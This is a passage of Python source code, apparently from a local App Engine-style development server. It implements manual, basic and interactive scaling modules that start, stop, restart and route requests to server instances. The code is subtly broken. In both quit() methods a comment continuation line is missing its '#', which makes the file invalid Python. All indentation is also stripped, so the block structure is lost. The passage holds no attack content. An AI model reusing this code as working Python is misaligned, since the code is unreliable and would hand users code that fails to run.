"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
key=lambda instance: instance.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
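# Summary of the selection policy (added comment): prefer a "required"
# instance with spare capacity, taking the one with the most free slots;
# otherwise reuse the busiest not-required instance that still has capacity,
# keeping idle instances idle so _adjust_instances can quit them later.
# Returns None only if nothing frees up before timeout_time.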
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
def _loop_adjusting_instances(self):
"""Loops until the Module exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingModule(Module):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
_MAX_REQUEST_WAIT_TIME = 10
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for ManualScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(ManualScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_manual_scaling(module_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the module has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in xrange(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
watcher so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
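# Illustrative call (assuming at least one instance exists):
# get_instance_port('0') returns the port of instance 0's WSGI server, while
# a non-integer or out-of-range id raises request_info.InvalidInstanceIdError.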
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _add_instance(self):
"""Creates and adds a new instance.Instance to the Module.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _async_start_instance(self, wsgi_servr, inst):
_THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in xrange(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
_THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this module, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.VersionAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = zip(self._instances, self._wsgi_servers)
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
_THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this module."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.VersionAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the module, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
for inst, wsgi_servr in zip(instances_to_stop, wsgi_servers):
self._async_suspend_instance(inst, wsgi_servr.port)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start):
self._async_start_instance(wsgi_servr, inst)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingModule(Module):
"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
_MAX_REQUEST_WAIT_TIME = 10
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
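# Worked examples: _parse_idle_timeout('15m') -> 900 and
# _parse_idle_timeout('30s') -> 30. Any suffix other than 'm' is assumed to
# mean seconds and is simply stripped, so a bare number like '30' would
# mistakenly lose its last digit.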
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
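# Example: with a command-line cap of max_instances=2 and a manifest value of
# basic_scaling.max_instances='5', the effective maximum is min(2, 5) == 2.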
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for BasicScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(BasicScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_basic_scaling(module_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in xrange(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
watcher so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
_THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the module, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandModule(Module):
"""A Module that can evaluate user commands.
This module manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files,
threadsafe_override):
"""Initializer for InteractiveCommandModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for this module.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
interactive command.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(InteractiveCommandModule, self).__init__(
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files,
threadsafe_override=threadsafe_override)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on.
The InteractiveCommandModule does not actually listen on this port but it is
used when constructing the "SERVER_PORT" value in the WSGI environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandModule."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingModule.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
# If the instance is restarted while handling a request then the
# exception raised is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
return ['The command timed out while waiting for another one to complete']
def restart(self):
"""Restarts the module."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
